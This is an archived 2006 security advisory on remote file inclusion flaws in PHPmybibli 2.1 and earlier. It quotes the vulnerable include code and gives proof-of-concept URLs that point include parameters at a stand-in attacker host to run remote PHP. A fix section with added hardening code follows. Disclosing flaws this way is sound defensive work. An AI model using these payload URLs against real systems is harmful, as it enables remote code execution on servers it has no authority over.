[ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability

2006-10-19T00:00:00
ID SECURITYVULNS:DOC:14736
Type securityvulns
Reporter Securityvulns
Modified 2006-10-19T00:00:00

Description

ECHO_ADV_55$2006

------------------------------------------------------------------------

[ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability


Author       : Dedi Dwianto a.k.a the_day
Date Found   : October, 17th 2006
Location     : Indonesia, Jakarta
web          : http://advisories.echo.or.id/adv/adv55-theday-2006.txt
Critical Lvl : Highly critical
Impact       : System access
Where        : From Remote



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHPmybibli
version     : <=2.1
URL         : http://www.pizz.net/

------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found a vulnerability in the script cart.php

--------------------------cart.php---------------------------------------
....
<?

include_once("$include_path/cart.inc.php");
include_once("$include_path/templates/cart.tpl.php");
include_once("$include_path/isbn.inc.php");
include_once("$include_path/expl_info.inc.php");
include_once("$include_path/bull_info.inc.php");
include_once("$include_path/notice_authors.inc.php");
include_once("$include_path/notice_categories.inc.php");
include_once("$include_path/explnum.inc.php");
include_once("$class_path/cart.class.php");
include_once("$class_path/caddie.class.php");
include_once("$class_path/author.class.php");
include_once("$class_path/collection.class.php");
include_once("$class_path/subcollection.class.php");
include_once("$class_path/mono_display.class.php");
include_once("$class_path/serie.class.php");
include_once("$class_path/serial_display.class.php");
include_once("$class_path/serials.class.php");
include_once("$class_path/editor.class.php");
require_once("$class_path/emprunteur.class.php");
require_once("$javascript_path/misc.inc.php");
...


Input passed to the "$include_path" parameter in cart.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Other affected files:

edit.php
circ.php
index.php
select.php
etc..

Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?

Solution:
~~~~~~~

  • Sanitize the variables $class_path, $javascript_path and $include_path in the affected files.
  • Turn off register_globals.
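
One way to apply both points of the Solution in PHP, as an added example that is not part of the original advisory or of PHPmybibli's code. The directory layout (includes, classes, javascript) and the helper resolve_include() are assumptions made for illustration:

```php
<?php
// Added example, not PHPmybibli code. Directory names are assumptions.
// Related php.ini settings: register_globals = Off, allow_url_include = Off.

// 1. Reject requests that try to supply the path variables themselves.
//    With register_globals = On, ?include_path=... becomes $include_path.
foreach (array('include_path', 'class_path', 'javascript_path') as $name) {
    if (isset($_GET[$name]) || isset($_POST[$name]) || isset($_COOKIE[$name])) {
        header('HTTP/1.1 400 Bad Request');
        error_log("blocked request overriding \$$name");
        exit('Bad request');
    }
}

// 2. Assign the paths unconditionally from the script's own location,
//    before any include, so a request-supplied value can never survive.
$base            = dirname(__FILE__);
$include_path    = $base . '/includes';    // assumed layout
$class_path      = $base . '/classes';     // assumed layout
$javascript_path = $base . '/javascript';  // assumed layout

// 3. Resolve an include to a real local file inside $dir, or return false.
function resolve_include($dir, $file)
{
    // Plain file names only: no slashes and no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.php$/', $file)) {
        return false;
    }
    $real_dir = realpath($dir);
    $real     = realpath($dir . '/' . $file);
    if ($real_dir === false || $real === false) {
        return false; // missing directory or file, or a remote URL
    }
    // The resolved file must still sit directly under the resolved directory.
    if (dirname($real) !== $real_dir) {
        return false;
    }
    return $real;
}

// Usage in place of include_once("$include_path/cart.inc.php"):
$target = resolve_include($include_path, 'cart.inc.php');
if ($target === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Configuration error');
}
include_once $target;
```

Files in a subdirectory, such as templates/cart.tpl.php, are resolved by passing the subdirectory as $dir rather than by allowing slashes in $file.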

------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker (at) yahoogroups (dot) com
~ #aikmel - #e-c-h-o @irc.dal.net



Contact:
~~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------